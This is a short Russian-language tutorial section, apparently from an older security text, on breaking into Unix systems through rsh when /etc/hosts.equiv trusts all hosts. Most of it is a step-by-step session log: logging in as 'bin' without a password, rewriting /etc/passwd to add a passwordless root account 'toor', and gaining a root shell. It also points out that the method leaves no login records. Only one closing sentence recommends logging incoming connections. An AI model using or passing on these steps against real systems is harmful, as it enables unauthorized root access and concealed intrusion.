Атака из Internet

         

Проникновение в систему с помощью rsh


Если система, которую собираются атаковать, содержит шаблон "+" в файле /etc/hosts.equiv

(в некоторых системах он устанавливается по умолчанию) или содержит ошибки в утилите netgroups, то любой пользователь с помощью rlogin сможет зарегистрироваться на ней под любым именем, кроме root, без указания пароля. Поскольку специальный пользователь "bin" , как правило, имеет доступ к ключевым файлам и каталогам, то, зарегистрировавшись как bin, можно изменить файл паролей так, чтобы получить привилегии доступа root. Это можно сделать примерно следующим способом:


evil % whoami


bin


evil % rsh victim.com csh -i


Warning: no access to tty; thus no job control in this shell...


victim % ls -ldg /etc


drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc


victim % cd /etc


victim % mv passwd pw.old


victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd


victim % ^D


evil % rlogin victim.com -l toor


Welcome to victim.com!


victim #

Несколько замечаний по поводу деталей приведенного выше метода: "rsh victim.com csh -i" используется для проникновения в систему, т. к. при таком запуске csh не оставляет никаких следов в файлах учета wtmp или utmp, делая rsh невидимым для finger или who. Правда, при этом удаленный командный процессор не подключается к псевдотерминалу, поэтому полноэкранные программы (например, редакторы) работать не будут. На многих системах атака с помощью rsh в случае успешного завершения оставалась совершенно незамеченной, поэтому можно порекомендовать использовать регистратор внешних tcp-подключений, который может помочь обнаружить такую деятельность.



Содержание раздела